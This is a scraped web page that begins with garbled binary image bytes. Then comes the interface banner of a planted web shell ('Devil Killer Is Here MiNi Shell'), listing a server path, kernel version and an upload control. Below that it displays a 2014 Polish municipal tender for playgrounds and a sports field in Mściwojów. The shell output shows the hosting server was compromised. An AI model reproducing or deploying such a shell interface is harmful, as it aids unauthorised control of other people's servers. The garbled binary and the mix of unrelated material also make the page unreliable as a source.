JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140320/59799-N-2014.html

<p class="kh_header"><b>Mściwojów: Budowa placów zabaw w miejscowościach Grzegorzów, Marcinowice, Zimnik, Targoszyn, Snowidza oraz budowa  boiska wielofunkcyjnego przy Szkole Podstawowej  w Targoszynie - ETAP II</b><br>
<b>Numer ogłoszenia: 59799 - 2014; data zamieszczenia: 20.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mściwojów , Mściwojów 43, 59-407 Mściwojów, woj. dolnośląskie, tel. 076 8728522 w. 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msciwojow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placów zabaw w miejscowościach Grzegorzów, Marcinowice, Zimnik, Targoszyn, Snowidza oraz budowa  boiska wielofunkcyjnego przy Szkole Podstawowej  w Targoszynie - ETAP II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje następujący zakres robót:
1. Budowę boiska wielofunkcyjnego przy Szkole Podstawowej w Targoszynie
Przedmiotem zamówienia jest budowa boiska wielofunkcyjnego o sztucznej nawierzchni przy Szkole Podstawowej w Targoszynie. Przedmiot zamówienia należy wykonać zgodnie z załączoną do SIWZ dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót budowlanych, zasadami wiedzy technicznej i sztuki budowlanej, obowiązującymi przepisami, w tym ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2013 r., poz. 907 z późn. zm.), ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2013 r., poz. 1409 z późn. zm.), polskimi normami, oraz zgodnie z zapisami ujętymi w SIWZ, w zakresie umożliwiającym uzyskanie, zgodnie z przepisami Prawa budowlanego, pozwolenia na użytkowanie. Przedmiot zamówienia obejmuje swym zakresem wykonanie między innymi następujących elementów robót: boisko wielofunkcyjne o nawierzchni poliuretanowej o wymiarach 18 m x 28 m (1 pole gry do koszykówki 28,10m x 15,10m, pole do gry do siatkówki 18,0m x 9,0m, pole do gry do tenisa 10,97m x 23,77m, pole do gry piłki ręcznej 15,10m x 28,10m) , powierzchnia boiska -522 m2. (Linie boiska do piłki ręcznej - żółte, linie boiska do koszykówki - białe, linie boiska do siatkówki - zielone, linie boiska do tenisa - niebieskie, nawierzchnia boisk w kolorze czerwono-brązowym); odwodnienie boiska wraz z przyłączem kanalizacji deszczowej; wyposażenie boiska: wyposażenie do piłki koszykowej: - stojak dwusłupowy  do koszykówki, montowany w tulejach o wysięgu min. 2,00 m - 2 szt., tuleja stalowa cynkowana ogniowo osadzona w płycie boiska - 4 szt., tablica do koszykówki laminowana o wym. 180x120 cm - 2 szt., obręcz ocynkowana uchylna z siłownikami gazowymi, siatka turniejowa, sznur gr. 5 mm - 2 szt., wyposażenie tenisa ziemnego: tuleja stalowa cynkowana ogniowo z pokrywami osadzona w płycie boiska - 2 szt., siatka polietylenowa do siatkówki czarna z antenkami, gr. splotu 3 mm - 1 szt.,  siatka polietylenowa do tenisa czarna profesjonalna z fartuchem, gr. splotu 2 mm -  1 szt., wyposażenie do piłki siatkowej: tuleja stalowa cynkowana ogniowo z pokrywami osadzona w płycie boiska - 2 szt., słupki do siatkówki stalowe cynkowane ogniowo, wielofunkcyjne z pełną regulacją wysokości  - 2 szt., siatka polietylenowa do siatkówki czarna z antenkami, gr. splotu 3 mm - 1 szt., wyposażenie do piłki ręcznej: tuleja stalowa cynkowana ogniowo osadzona w płycie boiska - 4 szt., bramki do piłki ręcznej 3,00x2,00, aluminiowe, osadzone w tulejach o głębokości do 1 m - 2 szt., siatka polietylenowa do bramek biała profesjonalna z piłkochwytem gr. splotu 5 mm - 2 szt., ogrodzenie boiska z bramą wjazdową i 1 furtką. 
Szczegółowy zakres robót opisany został w dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót budowlanych. Przedmiary należy traktować jako materiały pomocnicze przy wycenie oferty. W przypadku rozbieżności między przedmiarami, a projektem budowlano - wykonawczym, Wykonawca zobowiązany jest wycenić ofertę w oparciu o projekt budowlano-wykonawczy i specyfikację techniczną wykonania i odbioru robót budowlanych oraz niniejszy opis przedmiotu zamówienia. 4. Wykonawca winien skompletować wymagane ustawą Prawo budowlane oraz umową z Zamawiającym niezbędne dokumenty odbiorowe wykonane na koszt Wykonawcy w dwóch egzemplarzach, w tym m.in.: inwentaryzację geodezyjną powykonawczą w wersji papierowej oraz elektronicznej, protokół z badania wskaźnika zagęszczenia podbudowy boiska, atesty, certyfikaty, próby badania i sprawdzenia (w tym badanie uziarnienia, zawartości zanieczyszczeń obcych, zawartości zanieczyszczeń organicznych).
2. Budowę placów zabaw w miejscowościach: Marcinowice, Zimnik:
a) Zestaw zabawowy składający się z: 1 wieża kwadratowa z daszkiem dwuspadowym, 1 zjeżdżalnia, 1 ścianka linowa (szachownica), 1 pomost (koci grzbiet), 1 drabinka skośna wejściowa, Słupy nośne i belki poziome: belki o przekroju okrągłym śr. 100 i 60 mm lub kwadratowym, wykonane z drewna litego lub klejonego, impregnowane. Dach oraz burty boczne: wykonane z płyty HPL lub HDPE. Zjeżdżalnia: o ślizgu wykonanym z blachy nierdzewnej, burty malowane proszkowo. Przeplotnia linowa wykonana z lin polipropylenowych wzmocnionych wewnętrznym splotem stalowym. Nogi belek zamontowane w gruncie za pomocą stalowych kotew. Kolor belek - sosna lub drewnopodobny. Wymiary minimalne urządzenia: szer. 5,30 x wys. 3,80m;
b) Huśtawka podwójna, 1 szt., wykonana z drewna litego, bezrdzeniowego, o przekroju okrągłym o średnicy 100 mm lub kwadratowym. Belki połączone siodłowo zabezpieczone przed obrotem wokół własnej osi i rozchwianiem. Huśtawka posadowiona na kotwach stalowych ocynkowanych, montowana w gruncie przez zabetonowanie. Łańcuchy i mocowania wykonane ze stali nierdzewnej. Siedziska: 1 płaskie gumowe, 1  siedzisko z oparciem gumowe rozpinane atestowane. Kolor belek - sosna lub drewnopodobny. Wymiary minimalne urządzenia: szer. 3,50 x wys. 2,35 m;
c) Karuzela krzyżowa 1 szt., czteroramienna, ramiona karuzeli wykonane ze stali pomalowanej proszkowo. Łożyskowana tocznie z możliwością smarowania. Siedziska wykonane z kształtki aluminiowej zatopionej w miękkiej gumie, atestowane. Oparcia stalowe malowane proszkowo. Wymiary urządzenia: szer. 1,80 x wys. 0,65 m; 
d) Sprężynowiec 2 szt. Korpus wykonany z  tworzywa HDPE. Uchwyty wykonane z tworzywa sztucznego. Sprężyny min. O180 mm malowane proszkowo. Śruby zabezpieczone zaślepkami z tworzywa. Zabetonowane w gruncie za pomocą ocynkowanej ogniowo kotwy. Wymiary minimalne urządzenia: w. 0,85 x sz. 0,25 m;
e) Ławka parkowa z oparciem 1 szt. składająca się z: słupy nośne i belki poziome wykonane z belek drewnianych okrągłych o średnicy 100 mm lub kwadratowych lub na stelażu stalowym, drewno lite lub klejone, impregnowane, łączone za sobą poprzez siodłowe zakończenia. Siedzisko wykonane z desek impregnowanych o wymiarach 0,40 m. wysokość całkowita 0,90 m. Ławka montowana na kotwach. Wymiary minimalne urządzenia:  1,70 x 0,60 m, wysokość całkowita 0,90m;
f) Kosz na śmieci 1 szt., konstrukcja kosza - wykonana z belek okrągłych o średnicy 100 mm lub kwadratowych, impregnowanych. Belki zakończone zaokrągleniem. Kosz wykonany z półwałków z wewnętrznym wkładem metalowym. Wymiary minimalne: 0,60x0,45, wysokość całkowita: 0,80m;
g) Ogrodzenie - plac zabaw w Marcinowicach: 120m2, słupy wykonane z drewna impregnowanego, montowane na kotwach, zamontowane w gruncie za pomocą betonu. 2 furtki wejściowe zamykane. Przęsła wykonane z deski ryflowanej (100x10x2,2 cm o rozstawie sztachet 4 cm). Kolor belki - sosna lub drewnopodobny. 
h) Ogrodzenie - plac zabaw w Zimniku: 40m2, słupy wykonane z drewna impregnowanego, montowane na kotwach, zamontowane w gruncie za pomocą betonu. 2 furtki wejściowe zamykane. Przęsła wykonane z deski ryflowanej (100x10x2,2 cm o rozstawie sztachet 4 cm). Kolor belki - sosna lub drewnopodobny.
i) wykonanie prac przygotowawczych polegających na wykorytowaniu oraz dostarczeniu piasku płukanego - 36,89m3.
Wszystkie urządzenia powinny być wykonane z drewna litego lub klejonego o przekroju okrągłym lub kwadratowym, zabezpieczonego specjalistycznymi preparatami do głębokiej penetracji drewna oraz malowanego.
3. Budowa placów zabaw w miejscowościach: Targoszyn, Snowidza:
a) Zestaw zabawowy składający się z: 2 wieże kwadratowe z daszkiem dwuspadowym, wieży strażackiej, zjeżdżalni, kładki linowej, mostu linowego, ścianki linowej - pajęczyna, kominu linowego, kociego grzbietu, ścianki wspinaczkowej. Słupy nośne i belki poziome: belki o przekroju okrągłym śr. 100 i 60 mm lub kwadratowym, wykonane z drewna litego lub klejonego, impregnowane. Dach oraz burty boczne: wykonane z płyty HPL lub HDPE. Zjeżdżalnia: o ślizgu wykonanym z blachy nierdzewnej, burty malowane proszkowo. Przeplotnia linowa wykonana z lin polipropylenowych wzmocnionych wewnętrznym splotem stalowym. Nogi belek zamontowane w gruncie za pomocą stalowych kotew. Kolor belek - sosna lub drewnopodobny. Wymiary minimalne urządzenia: szer. 5,30 x wys. 3,80m;
b) Huśtawka podwójna, 1 szt., wykonana z drewna litego, bezrdzeniowego, o przekroju okrągłym o  średnicy 100 mm lub kwadratowym. Belki połączone siodłowo zabezpieczone przed obrotem wokół własnej osi i rozchwianiem. Huśtawka posadowiona na kotwach stalowych ocynkowanych, montowana w gruncie przez zabetonowanie. Łańcuchy i mocowania wykonane ze stali nierdzewnej. Siedziska: 1 płaskie gumowe, 1  siedzisko z oparciem gumowe rozpinane atestowane. Kolor belek - sosna lub drewnopodobny. Wymiary minimalne urządzenia: szer. 3,50 x wys. 2,35 m;
c) Karuzela krzyżowa 1 szt., czteroramienna, ramiona karuzeli wykonane ze stali pomalowanej proszkowo. Łożyskowana tocznie z możliwością smarowania. Siedziska wykonane z kształtki aluminiowej zatopionej w miękkiej gumie, atestowane. Oparcia stalowe malowane proszkowo. Wymiary urządzenia: szer. 1,80 x wys. 0,65 m; 
d) Sprężynowiec 2 szt. Korpus wykonany z  tworzywa HDPE. Uchwyty wykonane z tworzywa sztucznego. Sprężyny min. O180 mm malowane proszkowo. Śruby zabezpieczone zaślepkami z tworzywa. Zabetonowane w gruncie za pomocą ocynkowanej ogniowo kotwy. Wymiary minimalne urządzenia: w. 0,85 x sz. 0,25 m;
e) Ławka parkowa z oparciem 1 szt. składająca się z: słupy nośne i belki poziome wykonane z belek drewnianych okrągłych o średnicy 100 mm lub kwadratowych lub na stelażu stalowym, drewno lite lub klejone, impregnowane, łączone za sobą poprzez siodłowe zakończenia. Siedzisko wykonane z desek impregnowanych o wymiarach 0,40 m. wysokość całkowita 0,90 m. Ławka montowana na kotwach. Wymiary minimalne urządzenia:  1,70 x 0,60 m, wysokość całkowita 0,90m;
f) Kosz na śmieci 1 szt., konstrukcja kosza - wykonana z belek okrągłych o średnicy 100 mm lub kwadratowych, impregnowanych. Belki zakończone zaokrągleniem. Kosz wykonany z półwałków z wewnętrznym wkładem metalowym. Wymiary minimalne: 0,60x0,45, wysokość całkowita: 0,80m;
g) wykonanie prac przygotowawczych polegających na wykorytowaniu oraz dostarczeniu piasku płukanego - 44,59m3.
Wszystkie urządzenia powinny być wykonane z drewna litego lub klejonego o przekroju okrągłym lub kwadratowym, zabezpieczonego specjalistycznymi preparatami do głębokiej penetracji drewna oraz malowanego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.11.00.00-1, 34.11.52.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3.000,00 pln</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwa zadania polegające na budowie i/lub przebudowie  i/lub remoncie boiska wielofunkcyjnego z nawierzchnią poliuretanową na kwotę nie mniejszą niż 150.000,00 zł brutto każda z robót budowlanych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże dysponowanie  minimum 1 osobą, posiadającą i uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanymi, lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów.  Wykonawca wskaże podstawę do dysponowania tymi osobami oraz oświadczy, że wykazane osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że posiada  ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę minimum 200 000,00 zł (dwieście tysięcy złotych);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty  -  zgodny ze wzorem podanym w załączniku nr 1 do SIWZ,
2) Kserokopia wniesienia wadium, 
3) Oświadczenia i dokumenty - potwierdzające, że Wykonawca spełnia warunki udziału w postępowaniu,  określone w rozdziale VII siwz, 
4) Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentowania wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo określające zakres umocowania podpisane prze osoby uprawnione do reprezentowania wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków ich wprowadzenia:
1) Zmiana terminu realizacji zamówienia spowodowana w przypadku:
a) warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych zgodnie z dokumentacją projektową i STWiORB, w szczególności gwałtowne opady deszczu (oberwanie chmury), gradobicie, burze z wyładowaniami atmosferycznymi i inne klęski żywiołowe np. powodzie, obfite opady śniegu; 
b) okoliczności leżących po stronie Zamawiającego, w szczególności konieczność usunięcia istotnych błędów lub wprowadzenia istotnych zmian w materiałach przekazanych Wykonawcy - nie ujawnionych przed wszczęciem postępowania o udzielenie zamówienia publicznego;
c) prowadzenia wykopalisk archeologicznych w związku, ze znaleziskami w trakcie prowadzenia robót;
d) odkrycia na terenie budowy broni, bomb, niewybuchów lub innych materiałów wybuchowych oraz przedmiotów o znaczeniu archeologicznym i historycznym,
e) jeżeli zmianie ulegną terminy realizacji zadania uwzględnione w dokumentacji aplikacyjnej i w umowie o dofinansowanie (w tym wydłużenie terminu realizacji zadania) - termin zakończenia może zostać zmieniony o czas wynikający z uzyskanej przez Zamawiającego zgody na zmianę terminu,
f) jeżeli Wykonawca złoży wniosek o zmianę terminu wykonania umowy, a zmiana jest korzystna dla Zamawiającego - termin realizacji może zostać zmieniony w sposób uzgodniony pomiędzy stronami,
g) jeżeli wystąpią znacząco odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategoria gruntu, kurzawka itp.), warunki terenowe w szczególności  podziemne urządzenia lub niezinwentaryzowane obiekty budowlane itp., uniemożliwiające terminowe wykonanie przedmiotu umowy - termin realizacji może zostać przesunięty o czas niezbędny do wykonania prac wynikających z nowych warunków, 
h) wykrycia instalacji, urządzeń lub budowli podziemnych nie ujętych w dokumentacji projektowej i nie zinwentaryzowanych przez właścicieli i gestorów instalacji i urządzeń, a wymagających przebudowy w związku z wykonaniem przedmiotu umowy,
i) zmianą przepisów prawa, mających wpływ na termin wykonania robót lub sposób prowadzenia robót,
Termin zostanie wydłużony tylko o czas trwania przeszkody. Zmiana terminu realizacji nie będzie powodowała zwiększenia wynagrodzenia Wykonawcy,
2) Zmiany osobowe:
a) zmiany osób realizujących zamówienie, pod warunkiem, że osoby te będą spełniały wymagania określone w SIWZ;
b) zmiany osób reprezentujących w przypadku zmian organizacyjnych;
c) zmiana Podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy; zmiana jest możliwa tylko w przypadku, gdy nowy podwykonawca posiada tożsamą wiedzę i doświadczenie zawodowe, potencjał techniczny oraz osoby zdolne do wykonania Zamówienia a także jest w sytuacji ekonomiczniej i finansowej, nie gorszej niż dotychczasowy podwykonawca,
d) Zmiana kierownika budowy na wniosek Zamawiającego, jeżeli uzna, że nie wykonuje on należycie swoich obowiązków. Wykonawca zobowiązany jest wówczas dokonać zmiany kierownika budowy (przy zachowaniu wymagań określonych w SIWZ) w terminie nie dłuższym niż 14 dni od daty złożenia wniosku przez Zamawiającego.
3) Inne zmiany:
a) w każdym przypadku gdy zmiana jest korzystna dla Zamawiającego,
b) Zamawiający zastrzega sobie prawo do wprowadzenia zmian w harmonogramie rzeczowo-finansowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.msciwojow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Mściwojów, Mściwojów 43, 59-407 Mściwojów, pok. nr 12 - cena 45 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2014 godzina 12:00, miejsce: Urząd Gminy Mściwojów, Mściwojów 43, 59-407 Mściwojów, pok. nr 23 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




